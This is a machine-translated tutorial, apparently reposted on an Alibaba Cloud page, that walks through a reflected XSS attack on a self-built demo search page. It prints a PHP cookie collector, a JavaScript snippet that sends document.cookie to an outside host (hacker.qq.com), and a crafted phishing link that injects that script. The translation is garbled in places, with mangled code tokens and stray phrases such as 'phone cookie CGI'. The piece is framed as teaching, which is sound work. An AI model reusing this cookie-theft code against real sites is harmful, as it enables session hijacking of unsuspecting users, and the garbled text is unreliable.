Practical demonstration of reflective XSS

Source: Internet
Author: User

We know that XSS attacks are divided into three types: persistent, non-persistent, and Dom-based. The reflection type is the most commonly used and the most widely used attack method. It sends malicious scripts to othersCodeParameter URL. When the URL address is opened, the special malicious code parameters are parsed and executed by HTML. This feature is non-persistent. You must click a link with a specific parameter.

Today, we will give you a practical demonstration of a reflective XSS to learn more about this attack method.


Preparations:

(1) login), a login CGI (login. php), and a Search CGI (search. php ). The interface is as follows:

Because XSS vulnerabilities generally occur in the interaction with users, the search box is our focus.

(2) our own hacker website (another virtual site hacker.qq.com ). There is a hack. php under the domain name to collect users' cookies, and a hacker. JS is used to send requests to hack. php.

Vulnerability discovered

First, we need to find out where the XSS vulnerability of the site occurs. As mentioned above, the interaction with users is our main focus .. Now, we can enter a few characters "computer" at will and click "Search:

The search interface is as follows (this is a simple search interface written by myself ):

Here we found that the characters we entered appeared on the search interface (many e-commerce websites should be in this interface form ).. Okay. Here we enter some special characters to try "<SCRIPT> alert (1) </SCRIPT>" and click "Search:

A small pop-up window appears, it seems that search. PHP does not process the keywords entered by the user, and then directly outputs them to the interface. Since the XSS vulnerability exists, you can start to launch attacks, this attack aims to steal users' cookies.

Attack

First, let's write our own phone cookie CGI (hack. php). The Code is as follows:

 
<? PHP $ cookie =$ _ Get ['q']; var_dump ($ cookie); $ myfile = "cookie.txt"; file_put_contents ($ myfile, $ cookie);?>

Then write the hacker. js that sends the request. The Code is as follows:

VaR IMG = new image ();
IMG. src = "http://hacker.qq.com/hack.php? Q = "+ document. Cookie;
Document. Body. append (IMG );

Okay. Now we can construct a connection to fool the user:

<A href = "http://xsstest.qq.com/search.php? Q = % 3 cscript + SRC % 3 dhttp % 3A % 2f % 2fhacker.qq.com % 2fhacker. js % 3E % 3C % 2 fscript % 3E & commend = All & SSID = s5-e & search_type = item & Atype = & filterfineness = & RR = 1 & pcat = food2011 & Style = Grid & cat = "> click to send 998 </a>

View search. Q Parameter after PHP, after decoding, the actual function of <SCRIPT src = "http://hacker.qq.com/hacker.js"> </SCRIPT> is to simulate the user to enter <SCRIPT src = "http://hacker.qq.com/hacker.js"> </SCRIPT> in the search box and click Search. Search. php directly enters it into the page without processing, so that it has new semantics in the HTML document. It loads haker. js in the hacker.qq.com domain.

Open the hosts file:

It is found that all accounts and passwords used for login are included, and the passwords are encrypted .. OK. Now we can use this cookie to obtain the user's login status.

The entire attack process ends.

Of course, in the real process, few websites have such obvious XSS vulnerabilities .. Here, we just demonstrated the principles of the reflective XSS. Although there are many vulnerabilities in reality, they are essentially unchanged .. You can study it further.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.